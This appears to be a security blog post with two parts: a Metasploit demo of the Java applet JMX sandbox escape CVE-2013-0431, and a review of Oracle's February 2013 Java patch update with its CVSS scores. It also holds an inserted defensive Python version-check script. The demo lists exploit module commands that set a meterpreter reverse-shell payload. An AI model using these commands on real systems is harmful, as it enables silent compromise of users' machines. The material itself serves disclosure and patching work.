CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations on 2013-01-18
Vulnerability patched by the vendor on 2013-02-01
Vulnerability discovered being exploited in the wild by kafeine and EKwatcher on 2013-02-18
Metasploit PoC provided on 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7 Update 11 (7u11) and earlier

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February 2013. Additionally, this module bypasses the default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Oracle Java Critical Patch Update February 2013 Review

Oracle released its Java Critical Patch Update (CPU) for February 2013 on Friday, February 1. The initial release date was planned for 19 February, but Oracle pushed this update out earlier due to active exploitation in the wild of one of the critical vulnerabilities. Of the 50 security vulnerabilities fixed in this CPU, 49 may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0, and 34 vulnerabilities have a CVSS base score greater than or equal to 7.0.

It is actually not clear which of these vulnerabilities is the one exploited in the wild, but it could be related to CVE-2013-1489, a publicly reported issue concerning the Java SE 7 security features introduced in Java SE 7 Update 10.

As you may know, Oracle uses CVSS 2.0 (Common Vulnerability Scoring System) to score the reported vulnerabilities. But as you also may know, security researchers disagree with the way Oracle uses CVSS. Oracle plays with the CVSS score by creating a “Partial+” impact rating that does not exist in CVSS 2.0, and by interpreting the “Complete” rating differently than it is defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 11 and earlier
  • JDK and JRE 6 Update 38 and earlier
  • JDK and JRE 5.0 Update 38 and earlier
  • SDK and JRE 1.4.2_40 and earlier
  • JavaFX 2.2.4 and earlier
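A defender-side check against the affected-version list above, added here as an example (it is not code from the original post, from Oracle or from Metasploit): it parses Java version strings in both the `1.7.0_11` and `7u11` forms, flags any install at or below the last affected update of each family listed in this CPU, and runs the check over a constructed inventory of `java -version` output lines.

```python
import re

# Last affected update per family, taken from the February 2013 CPU list above.
# An install at or below this update number is still vulnerable.
AFFECTED_MAX_UPDATE = {
    "1.7": 11,   # JDK and JRE 7 Update 11 and earlier
    "1.6": 38,   # JDK and JRE 6 Update 38 and earlier
    "1.5": 38,   # JDK and JRE 5.0 Update 38 and earlier
    "1.4": 40,   # SDK and JRE 1.4.2_40 and earlier
}

# Long form as printed by `java -version`: 1.7.0_11, 1.4.2_40, or 1.7.0 (no update).
_LONG = re.compile(r"^(1\.\d)\.\d+(?:_(\d+))?")
# Short marketing form: 7u11, 6u38.
_SHORT = re.compile(r"^(\d)u(\d+)$")
# The quoted version inside a `java -version` output line.
_JAVA_VERSION_LINE = re.compile(r'java version "([^"]+)"')


def parse_java_version(s):
    """Return (family, update), e.g. ("1.7", 11), or None if the format is unknown."""
    s = s.strip()
    m = _LONG.match(s)
    if m:
        return m.group(1), int(m.group(2) or 0)
    m = _SHORT.match(s)
    if m:
        return "1." + m.group(1), int(m.group(2))
    return None


def is_affected(version_string):
    """True if the version is covered by this CPU's affected list, False if newer,
    None if the string cannot be parsed (so the host is never silently passed)."""
    parsed = parse_java_version(version_string)
    if parsed is None:
        return None
    family, update = parsed
    if family not in AFFECTED_MAX_UPDATE:
        return False  # family not named in this CPU's affected list
    return update <= AFFECTED_MAX_UPDATE[family]


def scan_inventory(text):
    """Map 'host <java -version line>' records to is_affected() results."""
    results = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        host, _, rest = line.partition(" ")
        m = _JAVA_VERSION_LINE.search(rest)
        results[host] = is_affected(m.group(1)) if m else None
    return results


# Constructed sample inventory (hostnames and versions are made up for the example).
INVENTORY = """\
ws01 java version "1.7.0_11"
ws02 java version "1.7.0_13"
ws03 java version "1.6.0_38"
srv1 java version "1.4.2_41"
"""
```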

CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2012-4301, CVE-2013-0425, CVE-2013-0426, CVE-2013-0428, CVE-2013-0436, CVE-2013-0437, CVE-2013-0439, CVE-2013-0441, CVE-2013-0442, CVE-2013-0445, CVE-2013-0446, CVE-2013-0447, CVE-2013-0450, CVE-2013-1472, CVE-2013-1475, CVE-2013-1476, CVE-2013-1477, CVE-2013-1478, CVE-2013-1479, CVE-2013-1480, CVE-2013-1481, CVE-2013-1482 and CVE-2013-1483 have a CVSS base score of 10.0.

CVE-2012-4305 and CVE-2013-1474 have a CVSS base score of 9.3.

CVE-2012-1543, CVE-2013-0419, CVE-2013-0423, CVE-2013-0429 and CVE-2013-0444 have a CVSS base score of 7.6.

CVE-2013-0351 has a CVSS base score of 7.5.

CVE-2013-0430 has a CVSS base score of 6.9.

CVE-2013-0432 has a CVSS base score of 6.4.

CVE-2013-0409, CVE-2013-0424, CVE-2013-0427, CVE-2013-0431, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0440, CVE-2013-0448, CVE-2013-0449 and CVE-2013-1473 have a CVSS base score of 5.0.

CVE-2013-0438 has a CVSS base score of 4.3.

CVE-2013-0443 has a CVSS base score of 4.0.

CVE-2013-1489 has a CVSS base score of 0.0.